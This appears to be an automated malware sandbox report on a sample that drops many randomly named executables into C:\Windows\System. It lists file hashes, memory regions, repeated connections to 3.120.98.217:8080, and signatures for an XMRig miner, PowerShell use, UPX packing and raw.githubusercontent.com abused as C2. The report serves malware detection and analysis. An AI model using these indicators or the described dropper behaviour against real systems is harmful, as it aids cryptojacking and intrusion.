C:\Windows\System\rRdTrAM.exe

C:\Windows\System\GDzozup.exe

C:\Windows\System\GDzozup.exe

C:\Windows\System\WyuiOSm.exe

C:\Windows\System\WyuiOSm.exe

C:\Windows\System\PdVByLC.exe

C:\Windows\System\PdVByLC.exe

C:\Windows\System\eadVsYe.exe

C:\Windows\System\eadVsYe.exe

C:\Windows\System\uWeHBcJ.exe

C:\Windows\System\uWeHBcJ.exe

C:\Windows\System\zFgIRRN.exe

C:\Windows\System\zFgIRRN.exe

C:\Windows\System\RQoiPNL.exe

C:\Windows\System\RQoiPNL.exe

C:\Windows\System\cdllOOv.exe

C:\Windows\System\cdllOOv.exe

C:\Windows\System\UrRcYdF.exe

C:\Windows\System\UrRcYdF.exe

C:\Windows\System\kSodrGd.exe

C:\Windows\System\kSodrGd.exe

C:\Windows\System\vhwOlVi.exe

C:\Windows\System\vhwOlVi.exe

C:\Windows\System\AYHsLUf.exe

C:\Windows\System\AYHsLUf.exe

C:\Windows\System\CaMpPjd.exe

C:\Windows\System\CaMpPjd.exe

C:\Windows\System\TWqZtfE.exe

C:\Windows\System\TWqZtfE.exe

C:\Windows\System\dNpqVOE.exe

C:\Windows\System\dNpqVOE.exe

C:\Windows\System\WyfBjYL.exe

C:\Windows\System\WyfBjYL.exe

C:\Windows\System\zjXaJVR.exe

C:\Windows\System\zjXaJVR.exe

C:\Windows\System\OSuNKmw.exe

C:\Windows\System\OSuNKmw.exe

C:\Windows\System\AMtlFNY.exe

C:\Windows\System\AMtlFNY.exe

C:\Windows\System\onqMMuw.exe

C:\Windows\System\onqMMuw.exe

C:\Windows\System\zQzsARC.exe

C:\Windows\System\zQzsARC.exe

C:\Windows\System\KIPJxuJ.exe

C:\Windows\System\KIPJxuJ.exe

C:\Windows\System\KycTEnw.exe

C:\Windows\System\KycTEnw.exe

C:\Windows\System\AXtdQYC.exe

C:\Windows\System\AXtdQYC.exe

C:\Windows\System\piyjJYY.exe

C:\Windows\System\piyjJYY.exe

C:\Windows\System\QtZOmjR.exe

C:\Windows\System\QtZOmjR.exe

C:\Windows\System\WucYedH.exe

C:\Windows\System\WucYedH.exe

C:\Windows\System\sHPyHsR.exe

C:\Windows\System\sHPyHsR.exe

C:\Windows\System\OsyuhkR.exe

C:\Windows\System\OsyuhkR.exe

C:\Windows\System\RHnwTwE.exe

C:\Windows\System\RHnwTwE.exe

C:\Windows\System\fvAMGCK.exe

C:\Windows\System\fvAMGCK.exe

C:\Windows\System\gzNiLDU.exe

C:\Windows\System\gzNiLDU.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

C:\Windows\system\goZRcqI.exe

MD5 ed72bba535f3d090160de3b6f7a7a558
SHA1 16a9daa74152f47e76ddd799dbf9c74a3ac62115
SHA256 d2cc076c40c863c8629b39c287c3f2903a37dfe15fa1cfdc2f2375f29ea28a85
SHA512 3c7356ddb6c4f9c2c768c31e1d4489999c9b39999227bc3e453dc67bdea0355042a7b0dcb4d51cd19c2c140d14b1d0ca4a48d86a3e63a324a1a2a05a9cc869d5

C:\Windows\system\fHZKZjx.exe

MD5 f0db7c815fe4ac53c92eb03aba1757bd
SHA1 50f4d521deff6b219619e2ec3e215eb6172a5c5e
SHA256 a82e55167b0be6c11f17ef3dd2c8e51e8921ca2e4c8a42f12a46cd7167767b6a
SHA512 c0ac5aed1725882e747087711ada35ce58882a01877fa2eb9cbc9ea8717a747ad37089697bce93930ae9a71bd52ff795c668c2d9ed206da1ed5d603a45e99393

C:\Windows\system\StxMTvc.exe

MD5 7ab6cd8da5f5053bcd9ded405d143363
SHA1 ec0a9d184ab060e5e980080eb9e6c4916254e8b7
SHA256 a975686fb099b04d5d55098262678c90a0b9621a8195ea88c0904bdf07719c65
SHA512 77c00cdd18464963f1f2506b0bf980b238a901f6a795c98369fad12fb1407ddead06baf57af65c67e9a891fd07272d5e0b802e5da3a331320695440cb4d01f04

C:\Windows\system\xIGeloP.exe

MD5 667c500931d328706708f38f8d3daf03
SHA1 0577e50da8cd578365780614e93c85b3bf7c7848
SHA256 fab6c2b13feb31328a782ec384baadf8be2589abd4fce2f99938973f782b5674
SHA512 d366f9f5cdb967228fd041c776bdb7414e50ffe3a4246b187181329df173e173bee0c350e172bb4d18a06c554324626d4c45dcb348b1e7c9002ab559dc498694

C:\Windows\system\UNdjKdF.exe

MD5 9373106f143206451a062c847fc32c5b
SHA1 5b86c3095224c260020714319b53c0337e3bdda3
SHA256 93ec1beeef6455556d52d551763d5e21b48d0445e6bbc222e3ff0d8be8b16332
SHA512 ec321c8859e22d67113a93f781da5d96d4525fe3c530afd02238841963ae3345030e0521723348970131f464111db6b973dcaa9ff1f017778537f7fafe2a2313

memory/1420-23-0x0000000003120000-0x0000000003516000-memory.dmp

\Windows\system\vcmyOjQ.exe

MD5 852dc169ea239830e11518078f871669
SHA1 ff61fd8c1ecad2bc91b78b4eb2eea47853f44134
SHA256 4c0b647306487b58638ab23db96122d1efb1b24250dad209058ec27cd8148762
SHA512 cc55363a5cffef9088c126bf966c89da2685c3f074e732b2c5cf7badfcdd1986c7f134118121f20a0a8f8cb02315fe7ab2caf9d1bebff9b4afcc8e0141013154

memory/1420-103-0x0000000003120000-0x0000000003516000-memory.dmp

memory/1420-105-0x0000000003120000-0x0000000003516000-memory.dmp

memory/2572-107-0x000000013FB60000-0x000000013FF56000-memory.dmp

\Windows\system\nEdxnNp.exe

MD5 8b996a36c3a97972de84ac27c76a43d2
SHA1 3b44f64c9e9a6a954cd3ac836ac5ca0833dc191f
SHA256 43c8ab0d7be512d19db0b62033eb7899075476f52205b4bd4272b6811a8c248b
SHA512 5d161d76190dd739a64a4f9d43a89ee6b8d61be05f98966ba6c2e28595cde4514ead03704215ebde277a6fd9a8e66d38cd288dc00df4b6492f01c3f344ab5267

C:\Windows\system\bOzepYI.exe

MD5 42b26eae28514724e3e48d4257284a0d
SHA1 e0d4ec8118e73effe868d432a2fa8310bcb6cab2
SHA256 97499d76b5068881cb73fde1a030e5dd3c8a70ea391fd3496e6afef80a07a14a
SHA512 e6acc5b428da820d2b3f151494c36cec449f4d10a258fdc6de587aa3a4e47d76f880e02c789c9e6606eab3cb332f68b532d42557435c2a14ce6f7d463d6f8c28

C:\Windows\system\BtYGvZM.exe

MD5 0e6d0000a9a187fc6d3fa572da9b46a9
SHA1 06bda81022992de4426c6692463ab5287ebe6d43
SHA256 9067d0b512ed1a69272231f0933e9163abaf5d9d95bea180811e81a6bf016399
SHA512 408c8ba3460aece47295ef450ebd96993ee870adfc03a1006a1672b002fcb7996734eb81f534c11b78f27cb224694658560230beafb8f7958d653564d64dee4a

C:\Windows\system\tjYywdo.exe

MD5 08ccea1105bf06119b8921b24de964a7
SHA1 58ba37b00a4803f14dc4a9d73b7b216ad63e253f
SHA256 2dba6303869a5b5f7a6c5671ec5ad33799a2f697d069e4c4d9b2809b6b3792e2
SHA512 461a235537bb01e98051955958d5aa63a94b41dcb5dc5a797d7d8c355fc504242550d88724f903555b0709020a898ea867349b7a6e5a198ac72d1ded3e369d11

C:\Windows\system\dREvuDU.exe

MD5 050927fb4e21453d118bd807519e3e98
SHA1 b5ce458a87d32053e7b3bd41d24bb8c695e7d4ad
SHA256 21763d11c6f006a4ea5415d5d7abeab6cf9c75a45441774b291e81616307eeaa
SHA512 6d6f32c348b8befe4f78f78862e99c2ee2d9ad355d4902cf2f793ed9488b5f9b96649827fdec7b8d323bb1664841fa60db7ff880005de64d25f8c3a65ffbbef8

\Windows\system\zrqaQvT.exe

MD5 4992ce362ac50d033109344b666e156b
SHA1 d3d98ed883befc3a9fb7a15df5a1006d810806aa
SHA256 0716cae9b9d50c8b6761608d1599e1d7450e6cda53bd639ba3e3a0fc447b7ec2
SHA512 d1a42022319c1578571fe27ed8b0b43cf957c81b8ee222e998e332d9c1da4c90444f31ceaa4bd42e171f5aa4c4fa0914784088c0adcf7e866fdd3ca168461203

\Windows\system\NwLpIij.exe

MD5 d2255425b3aad9d387bf8e8bcdf3e214
SHA1 d317d03ebfd5c42ea5c4374fd81778fe791b10fb
SHA256 60a9f9035c82621fd94036170cc0e6ab8fe0da3575012cc07609116f1a799428
SHA512 7cfbd9e82872eb9f41d8b1ae5a26c4103e6d61d8036f69e0b15160901bb41d16d0e4326be74593ee9c0f8eafe1bd513df235c0792d4df3622611bc06f7abaddb

C:\Windows\system\VwtiHwr.exe

MD5 a63a6c5eaa748cb921cbfb613497fca7
SHA1 91371b0bb3fe35b9592b5fd59513f29a138f2434
SHA256 7b19c29fbbd1c806a436d4d52fc54b0744fb553324936ea1c9fed7e3a3b0110f
SHA512 d300bac62e046265e58e6a02c7f42e126d4401655f9bbcda03aaad2358d35222155fcf51da0d9330b487227bb9dd9ff760f0c191ee9c41da891ff98c33accd30

memory/2240-172-0x00000000020B0000-0x00000000020B8000-memory.dmp

memory/2240-171-0x000000001B550000-0x000000001B832000-memory.dmp

C:\Windows\system\EewyFxf.exe

MD5 4550a24fd4391b706b841e0c9e814ccf
SHA1 08e66f6ea917d98c3fd6a583995c97dddb584f74
SHA256 53ff5ca7064431f784a87e55e5f5196884e45896c0ccef2750df0bc0c2babc37
SHA512 15546d75af49607cdaf570e7a6107d12e743f87b4f761914ff29292feca353783bb923aa1b12a50570b8ae30b56ba69b2bc4948e65ea241f1070279d582337ff

C:\Windows\system\CeosUzc.exe

MD5 0d8ee1b0fff8eca39b29e34de853ee16
SHA1 918136e13968ab19eb40646f89d9d92ce2d53f89
SHA256 fb48f702f982d7fa78fed1b6156ec189bd0e2db6d25094c7938fabda6ed4290c
SHA512 39a0d5b019702c3972e86af602c6ba5c520d6b1d8f40b7ae4cb636a89fcc3720e7fee5ce49848ae8f12ecc81535d301a91581b9d2fe4ae0063df86b11683c297

C:\Windows\system\RhvekTL.exe

MD5 95a1632106bb1bc8e125ad4f80ed7c91
SHA1 af813abe77b1dc1a2e4b088e9f614d7330006076
SHA256 290a785f682732f9dd0233e33d5243a74d03cd6316d27879f070d76953dc7d56
SHA512 94a93c5c5fbe343d8092276724543a990343fe175e8a25a1a1191a0c4f188aaeae8076da0a4a110dc92fa7a27374ad9656754a57eb5b9bd273393aa8ca36b126

C:\Windows\system\uuhHKza.exe

MD5 15803b8554fe2888fd67bf5f572f9fc0
SHA1 ffa380f5a215474c38de9c65103e3c154bce1e9c
SHA256 2c9d3e14696b62ceec482a92d81934a55695ff10a25733accd1d23831e376cda
SHA512 bb1353221b98f6e64b7abaa505fe45c6f017b8d1f2ac2cb5e73decc3a07d7a6f674bf5d9c1929743f160407d8c0275a74e5b8cd39c4e55ebdb49e3232802c14d

C:\Windows\system\btguKPq.exe

MD5 b126a77507228bf73ca538f8098e2fd9
SHA1 6bf599f609697681c0500d3d55b0dbb06d9ab01c
SHA256 d99b4642e0abe08a860f511ba6fe45e47370c56a01edfa1b1eb9c83f967f7682
SHA512 82380275aa2be4e9435521b374c7c890e1dc9c7dd238b3df5e30b70c7f52492f36b160d7e0a2e1f5446f23c7e9f29238e5b905828b80a4772fa2b4b41cff8b82

C:\Windows\system\CJyHorP.exe

MD5 6c64c3ae09b23709f188d072a5afc415
SHA1 d8373eb7b0e1df4c8a22da54b19e1922f6ddd0db
SHA256 c315c171189febbde22d3e8cd7ce3dbed26d111ae4e5fb078ccda532b4a2825b
SHA512 354212508e2c6a25857f6e53fc1be1e116e9aa135e76edbe13fb256b569511f9d77ff7494243584cea4a68925692f28d71a2e3baad610b9db3125c169fd4ada9

C:\Windows\system\ThbrLJt.exe

MD5 40e296c95400daf47d8666c960caf9dd
SHA1 327755cfa569ef1d10e43c8ab669f77a87673d0c
SHA256 d89f7e7729cd4b7807c17dc97242b0b5948fd6699502fe50de03403f188360ff
SHA512 a56fd60b532da884e15537d4f77846192a56b2ec3128f1b9effc0ba8ffe7f8f17a9d973890c9d016bbac8a79e86195a8c9af4e2fa6b9f8715f2e11eae10b784f

memory/1420-112-0x000000013FB60000-0x000000013FF56000-memory.dmp

\Windows\system\wSIGoJU.exe

MD5 61dee96c074e19f9156d31d07aa05ffd
SHA1 2c140b52c5fcf6a61add0b068057a9080f31d2de
SHA256 f1c822e7971faebb059942e8d5d73292d76d0c0ae02e95447f64aaf9c6a973ed
SHA512 caa6bb10b21fbf4fa1be116527611fc515a96275ff37ab32a31f337104c6967ece43ad96edcc23fb042c949bda173df59cb23e44cced9ac95922b49054755e19

memory/2608-94-0x000000013F240000-0x000000013F636000-memory.dmp

memory/2656-92-0x000000013FF40000-0x0000000140336000-memory.dmp

memory/1288-91-0x000000013FD70000-0x0000000140166000-memory.dmp

memory/2000-90-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/1420-89-0x0000000003120000-0x0000000003516000-memory.dmp

\Windows\system\CdeYIKP.exe

MD5 fe29d31c4f932b102faf34c61fcfa94b
SHA1 2292c9aed88b6ab9bcbddc79faed90bde31fef1c
SHA256 3aedbc4d22a4ac833c1c256c5a50cd81cfd535db0f1fe9afc9f09cdc4e79c884
SHA512 a8aa5d91ecaea1c4aeded08118d19648aebd1f3cf54ae6ea4793ada8625ff6d087280b2668515c14be09c05a3340121600c77f0762da63f12d492db856990bae

memory/1420-80-0x0000000003120000-0x0000000003516000-memory.dmp

memory/1420-79-0x000000013FF40000-0x0000000140336000-memory.dmp

C:\Windows\system\PviXJzn.exe

MD5 bfd9608a074a8ed528d0e4fc4d3d3717
SHA1 a66c1f8021cc9990d0c502cae930f50a55741731
SHA256 97e526a007ac3ed6a52bddddffecafee2a5876412a6530ff17b327c63d300f55
SHA512 637fbdba7093fcf003327010d13c3c0797970c3bf469cc3863df6ed45270db2672087f15c809b26a66580d9cdd7888fd1aa7ddf2acc9a80b67bae992ea57e5f5

C:\Windows\system\GkOIZTx.exe

MD5 18786607259b3f823790f88a0853104e
SHA1 fc04bc284292d4058c46abaedbcbf63709dd760e
SHA256 22882bd7d6b3aebc88dce55ebb4f5ac5eba91972beb8feec5299d64ee4026d60
SHA512 9baa807e2b71d4c863a91fe20e0c84b90c861ac9c08e562b5796b55529e395daeb03febf01779f13b2bc9ec27af65d01cb0c11df1af0b4f6af8c21d281786696

C:\Windows\system\ilFAkif.exe

MD5 2743f6b6114c39b32c8b404682b09843
SHA1 d6642b3eb8e3b02f90a341babfc4e93c7e74e1c4
SHA256 e85d957c5ef4c105e9985bf8621a79d9fdedcb957e7966de8f08eeb898c53f62
SHA512 76c8d9a1a80c3b5d117a8d1cbe5f6b35bc000fbf58120abd7274ae464d9e9c8aae76f17b446e12334cf69c5f403e921ff006a76286acb65e5b65f30b09a5f9cc

\Windows\system\ZOUgimV.exe

MD5 1e1e0ee05a6223bc39daed8276470725
SHA1 6fbe0722fc354996b1b4d3ff1ca031d7d1f9bafb
SHA256 e8e372be55a445797d2b89c7582a5bbeb368361d0b56a3ea593d5afbb0cf645c
SHA512 18ae8bbfd138af86147f98718f7da0cc19bfa737984d7c34c7857fe7043ec76116d504fb7eaf0ad4a6d77c3d1b9d6dd38a3e88f679bc95120f8090d0995172a8

C:\Windows\system\dkBqWVh.exe

MD5 c01ce6f9c7c00401bf417a848e933203
SHA1 395ab10ebf8d88969f1bed22c7ed412a6cfc1d9e
SHA256 7a98920f9dda8a3768df0468cbf927adf29aef0fc1de05e97ad0c64f35a4a020
SHA512 23dc33098bba0236ac661c35d10b6ce0dc1baac2606312e0c3042c402e2d7f018005b195d10a8da252987d9626abe071d58cdf036ad983598d85d5635e8cae1f

\Windows\system\gbbVjtF.exe

MD5 9d36aa873e45d960fe24664397c68923
SHA1 55a2ba611e6918bd3dd60dfcccaaec8dcedecdf6
SHA256 d16ebb9b6dd5dedb147b3acd004ea5cbf48bc7ad60b9e8821efe36f154937670
SHA512 ecd9b5c44a2b33fa75a55c67675bb92c9e7d67fc86a59e18f1f9f02c3a39177417b0be9be9322a5ace178570f874f6e98191b14d7b0fc1dd12daddd1f253ad5a

memory/1420-10-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/1420-108-0x000000013FF00000-0x00000001402F6000-memory.dmp

memory/2508-106-0x000000013F450000-0x000000013F846000-memory.dmp

memory/3048-104-0x000000013F320000-0x000000013F716000-memory.dmp

memory/1420-102-0x000000013FEE0000-0x00000001402D6000-memory.dmp

memory/1420-98-0x0000000003120000-0x0000000003516000-memory.dmp

C:\Windows\system\GvQQrrE.exe

MD5 03353fa94e645f01e534e7431dd754b2
SHA1 a9e5092d43b89253396cbc96858a5a39a6984201
SHA256 dc50facd4d8cfd266455fd20cc45bed0c606ab49c1115380be9bb4d6b5051223
SHA512 7ce5f0c191595ba13ca4c67c9dd8c4de48ee874e2d5638c1341113afc540cf81bc89fffb2b9157988ed55978fa818032c317276ebb0378101c2bf7be2c8596cd

C:\Windows\system\rydwIIT.exe

MD5 321a4fa0c0b03e010a40851a2b12085b
SHA1 3fb1b1a402de62015599491404a50ff71a9ca6ec
SHA256 e4f3a97bf86bf2312924840ba05d8f4103e6932c21f3bf5930d050b8f5281588
SHA512 6aa583aa98926ea7c7c202ec6a482f0f2b2a91b2ef20a417ddb34f0dc132d436dbe8536e54ce192094922a61815a4e0765c36fc3902ad7e4520f7294f2fcf2f5

C:\Windows\system\bLCdRZK.exe

MD5 a0038efb3b5bfbade8f11df70bb03202
SHA1 5ef7126d1311e77ee586c27192608c4318fba09f
SHA256 8191f08461d24e8e578f8ca63049c262b60c54c20bab035a90d3510c919fb11b
SHA512 a330ac4367f0b3178ff6d612f4c69801ab98250e9fdd4c3998a74da232503a891a8938eacae395a42f0ee7a77fdad83f39282b1c6282195930364e362b362b91

memory/1696-18-0x000000013FF70000-0x0000000140366000-memory.dmp

memory/1420-29-0x000000013FFD0000-0x00000001403C6000-memory.dmp

C:\Windows\system\DOCaKvf.exe

MD5 46e0563b1e14875a4448aa52c9c76eda
SHA1 fad55ece5c7076d304378026059cb06ee4eb5f9b
SHA256 36c0b2837374eb59650588d5dd247272f2728e8d324979383bebce367acc7541
SHA512 1e1fcb650db1452a06bb8ee13f2ab467daf319b3091dc3702c9ac5714f0bd06d51da4df89b512e62e011bf2a3d87e5f89a5348259cbbf3123a782c0baf74aa91

memory/1420-0-0x00000000002F0000-0x0000000000300000-memory.dmp

memory/1420-2-0x000000013F050000-0x000000013F446000-memory.dmp

memory/1420-3560-0x0000000003120000-0x0000000003516000-memory.dmp

memory/1420-4110-0x000000013FD70000-0x0000000140166000-memory.dmp

memory/1420-4999-0x0000000003120000-0x0000000003516000-memory.dmp

memory/2608-7553-0x000000013F240000-0x000000013F636000-memory.dmp

memory/2508-7554-0x000000013F450000-0x000000013F846000-memory.dmp

memory/3048-7556-0x000000013F320000-0x000000013F716000-memory.dmp

memory/2572-7555-0x000000013FB60000-0x000000013FF56000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-23 20:40

Reported

2024-05-23 20:42

Platform

win10v2004-20240508-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\UqERfDb.exe N/A
N/A N/A C:\Windows\System\dWmosVM.exe N/A
N/A N/A C:\Windows\System\OQZXQuP.exe N/A
N/A N/A C:\Windows\System\fFnfMUL.exe N/A
N/A N/A C:\Windows\System\ayZoGgd.exe N/A
N/A N/A C:\Windows\System\VoQXMRm.exe N/A
N/A N/A C:\Windows\System\zLpQsMN.exe N/A
N/A N/A C:\Windows\System\SEWrPAq.exe N/A
N/A N/A C:\Windows\System\eVyxpoj.exe N/A
N/A N/A C:\Windows\System\lcohyhA.exe N/A
N/A N/A C:\Windows\System\fZvysLD.exe N/A
N/A N/A C:\Windows\System\hAglDlU.exe N/A
N/A N/A C:\Windows\System\KSyLfCf.exe N/A
N/A N/A C:\Windows\System\lbFJgkS.exe N/A
N/A N/A C:\Windows\System\MyCNbMq.exe N/A
N/A N/A C:\Windows\System\KjSrPfr.exe N/A
N/A N/A C:\Windows\System\bLbAGKl.exe N/A
N/A N/A C:\Windows\System\YJpnhyR.exe N/A
N/A N/A C:\Windows\System\TNCjteE.exe N/A
N/A N/A C:\Windows\System\wNXPxVA.exe N/A
N/A N/A C:\Windows\System\vPFxrLo.exe N/A
N/A N/A C:\Windows\System\BCfawpd.exe N/A
N/A N/A C:\Windows\System\XVAUXyo.exe N/A
N/A N/A C:\Windows\System\ipmiTZu.exe N/A
N/A N/A C:\Windows\System\CnDzQhq.exe N/A
N/A N/A C:\Windows\System\rUkxiYq.exe N/A
N/A N/A C:\Windows\System\FpbnwVO.exe N/A
N/A N/A C:\Windows\System\ghXMNdx.exe N/A
N/A N/A C:\Windows\System\oCNWiQY.exe N/A
N/A N/A C:\Windows\System\uGBIftN.exe N/A
N/A N/A C:\Windows\System\qgmgYui.exe N/A
N/A N/A C:\Windows\System\TGajqON.exe N/A
N/A N/A C:\Windows\System\pgDfvIh.exe N/A
N/A N/A C:\Windows\System\NvtJcqt.exe N/A
N/A N/A C:\Windows\System\tPuyDkz.exe N/A
N/A N/A C:\Windows\System\Xsbfufl.exe N/A
N/A N/A C:\Windows\System\cmKstpT.exe N/A
N/A N/A C:\Windows\System\KDGpsKl.exe N/A
N/A N/A C:\Windows\System\PBawdXn.exe N/A
N/A N/A C:\Windows\System\CmkIpal.exe N/A
N/A N/A C:\Windows\System\sGxZvtX.exe N/A
N/A N/A C:\Windows\System\uElNzLn.exe N/A
N/A N/A C:\Windows\System\FjBtxix.exe N/A
N/A N/A C:\Windows\System\kZvKdKw.exe N/A
N/A N/A C:\Windows\System\ECaZRCM.exe N/A
N/A N/A C:\Windows\System\ABVjHxt.exe N/A
N/A N/A C:\Windows\System\dZRkMVV.exe N/A
N/A N/A C:\Windows\System\qfHIFvo.exe N/A
N/A N/A C:\Windows\System\YZLoNkU.exe N/A
N/A N/A C:\Windows\System\SXJplkG.exe N/A
N/A N/A C:\Windows\System\qyJJKIO.exe N/A
N/A N/A C:\Windows\System\KalCaWo.exe N/A
N/A N/A C:\Windows\System\VwFKNWp.exe N/A
N/A N/A C:\Windows\System\ypGmHzW.exe N/A
N/A N/A C:\Windows\System\ZrsKOui.exe N/A
N/A N/A C:\Windows\System\AAKAWJl.exe N/A
N/A N/A C:\Windows\System\FKIWNZT.exe N/A
N/A N/A C:\Windows\System\jDKoUbG.exe N/A
N/A N/A C:\Windows\System\vmPhqlp.exe N/A
N/A N/A C:\Windows\System\fEgyKdC.exe N/A
N/A N/A C:\Windows\System\QwJJVDV.exe N/A
N/A N/A C:\Windows\System\sUsxAPk.exe N/A
N/A N/A C:\Windows\System\cbiNHXZ.exe N/A
N/A N/A C:\Windows\System\frKoCHM.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\IMlnCqf.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\joQvqTg.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\NRlbMJj.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\nsJDMaG.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\mUAXdqI.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\XoNExnX.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\nbgHrjB.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\rfWhDEx.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\qRhEVag.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\bUnvHnx.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\NOLbZID.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\VRqbBvQ.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\jyAMviN.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\NebHJDs.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\PVmotUk.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\DXnpCiR.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\SlEsSgh.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\TVHQpZD.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
